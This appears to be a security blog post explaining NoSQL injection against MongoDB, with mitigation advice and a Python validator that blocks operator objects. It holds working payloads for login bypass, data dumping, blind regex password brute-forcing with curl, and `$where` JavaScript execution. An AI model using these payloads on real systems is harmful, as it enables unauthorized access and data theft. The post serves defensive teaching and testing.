NoSQL Injection: The Silent Threat in Modern Databases

While SQL Injection (SQLi) dominates headlines, NoSQL Injection lurks as an equally dangerous yet often overlooked vulnerability in applications backed by databases like MongoDB, CouchDB, or Cassandra. Instead of breaking out of a string inside a query language, NoSQL injection abuses query operators (`$gt`, `$ne`, `$where`) or the way a JSON request body is parsed straight into a query object, and uses that to bypass authentication, dump data, or run server-side JavaScript.

You Should Know:

1. Basic NoSQL Injection Payloads

  • Bypass Login:
    { "username": { "$ne": "" }, "password": { "$ne": "" } }

    When the server passes the decoded JSON body straight into the query, `$ne` turns each field into a "not equal to the empty string" condition, so the lookup matches any user whose `username` and `password` are non-empty instead of one specific account.

  • Extract Data:
    { "user": { "$regex": "." }, "password": { "$exists": true } }

    `$regex: "."` matches any non-empty `user` value and `$exists: true` matches any document that has a `password` field, so the filter returns every user document in the collection.

2. Exploiting MongoDB Operators

  • Blind NoSQLi:
    curl -X POST http://vulnerable.site/login -H "Content-Type: application/json" -d '{"user":{"$eq":"admin"},"password":{"$regex":"^a"}}'

    The anchored regex `^a` only matches if the stored password starts with `a`, so the login response (success or failure) leaks one character at a time; repeating the request with other prefixes brute-forces the password character by character.

  • Server-Side JS Execution:
    { "$where": "this.password.length > 0" }

    `$where` evaluates arbitrary JavaScript inside `mongod` for every candidate document. It only works when server-side scripting is enabled, which is the default unless the server is started with `--noscripting` (or `security.javascriptEnabled: false` in the config file).

3. Mitigation Commands

  • Enable MongoDB Security:
    mongod --auth --bind_ip 127.0.0.1

    `--auth` forces clients to authenticate and `--bind_ip 127.0.0.1` stops the server from listening on external interfaces. Neither flag stops operator injection coming through the application's own connection; that is what the input validation below is for.
  • Input Validation:
    from pymongo import MongoClient
    client = MongoClient()
    db = client.secure_db
    # Only a plain string may reach the query; an object such as {"$ne": ""}
    # decoded from the request body is rejected before the driver sees it.
    if not isinstance(sanitized_input, str):
        raise ValueError("username must be a string")
    db.users.find({"username": {"$eq": sanitized_input}})
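    As an added defensive example (not code from the original post), the following Python validator shows what the `sanitized_input` step has to do in a login handler: recursively reject any `$`-prefixed key, enforce plain strings, and build the filter with `$eq`. The function names, the `InjectionAttempt` exception and the sample request bodies are constructed for illustration; the two bypass payloads are the ones quoted above.

```python
import json


class InjectionAttempt(ValueError):
    """Raised when a login body carries MongoDB operator objects or non-string fields."""


def contains_operator(value):
    """Recursively scan a decoded JSON value for any key that starts with '$'."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def validate_login(body, max_len=128):
    """Return (mongo_filter, password) for a decoded login body, or raise InjectionAttempt.

    Both fields must be plain non-empty strings, so {"$ne": ""}, {"$regex": "."}
    and similar operator objects are rejected before the driver ever sees them.
    The filter pins the username with $eq; the password is handed back for hash
    verification in the application instead of being matched inside the query.
    """
    if not isinstance(body, dict) or contains_operator(body):
        raise InjectionAttempt("operator object in login body")
    username, password = body.get("username"), body.get("password")
    for field, value in (("username", username), ("password", password)):
        if not isinstance(value, str) or not 0 < len(value) <= max_len:
            raise InjectionAttempt(f"{field} must be a non-empty string")
    return {"username": {"$eq": username}}, password


def classify_request(raw_body):
    """Parse a raw JSON body; return ('ok', filter) or ('blocked', reason) for logging and alerting."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        return ("blocked", f"malformed JSON: {exc.msg}")
    try:
        mongo_filter, _password = validate_login(body)
        return ("ok", mongo_filter)
    except InjectionAttempt as exc:
        return ("blocked", str(exc))


if __name__ == "__main__":
    # Constructed sample bodies: one legitimate login plus the two bypass payloads from the post.
    for raw in (
        '{"username": "alice", "password": "s3cret"}',
        '{"username": {"$ne": ""}, "password": {"$ne": ""}}',
        '{"username": {"$regex": "."}, "password": {"$exists": true}}',
    ):
        print(classify_request(raw))
```

    Logging the `blocked` reason gives the SOC a cheap detection signal: a burst of `operator object in login body` events from one client is a NoSQLi probe, not a typo.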
    

4. Practice Lab Setup

  • Dockerized Vuln App:
    docker run -d -p 27017:27017 --name vuln-mongo mongo:4.0
    docker run -p 3000:3000 --link vuln-mongo vuln-app
    

What Undercode Say

NoSQL Injection thrives in APIs and modern stacks. Test for:
– Content-Type: Switch `application/json` to `application/xml` for parser flaws.
– Error Handling: Trigger DB errors with malformed JSON or with operator objects in unexpected places (`{"$gt": ""}`); verbose error pages confirm that request bodies reach the query layer unfiltered.
– Tooling: Use `NoSQLMap` (`python nosqlmap.py -u http://target.com`) or Burp Suite’s JSON Query Tampering.

Expected Output:

  • Vulnerable Request:
    POST /login HTTP/1.1
    Content-Type: application/json
    {"user":{"$gt":""},"pass":{"$gt":""}}
    
  • Exploit Result: Bypasses authentication, returns first user in the collection.

Prediction

NoSQLi will surge as more apps abandon SQL for schema-less databases—pen-testers must adapt to JSON/operator-based attacks.

Reference: NoSQL Injection Video Demo

Reported By: Faiyaz Ahmad – Hackers Feeds